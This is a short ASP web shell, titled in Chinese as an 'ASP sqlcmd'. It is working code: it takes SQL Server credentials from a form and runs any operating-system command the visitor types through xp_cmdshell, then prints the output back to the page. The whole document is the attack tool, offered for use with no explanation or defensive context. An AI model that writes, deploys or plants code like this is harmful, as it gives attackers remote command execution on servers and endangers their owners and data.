一个asp 的sqlcmd

<% If trim(request.form("cmd"))<>"" Then %>
<%
password= trim(Request.form("pa"))
id=trim(Request.form("id"))
set adoConn=Server.CreateObject("ADODB.Connection")
adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id
strQuery = "exec master.dbo.xp_cmdshell '" & request.form("cmd") & "'"
set recResult = adoConn.Execute(strQuery)
If NOT recResult.EOF Then
Do While NOT recResult.EOF
strResult = strResult & chr(13) & recResult(0)
recResult.MoveNext
Loop
End if
set recResult = Nothing
strResult = Replace(strResult," "," ")
strResult = Replace(strResult,"<","<")
strResult = Replace(strResult,">",">")
strResult = Replace(strResult,chr(13),"<br>")
response.write strResult
End if
set adoConn = Nothing
%> <br><table border=0 width=500 cellspacing=0 cellpadding=0 bgcolor="#B8B8B8" class="noborder">
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<form name="form" method=post action="<%=Request.ServerVariables("URL")%>">
<input type="text" name="cmd" size=25 >
<input type="text" name="id" size=10 value=<%=id%>>
<input type="text" name="pa" size=10 value=<%=password%>>
<input type="submit" value="执行cmd命令">
</form>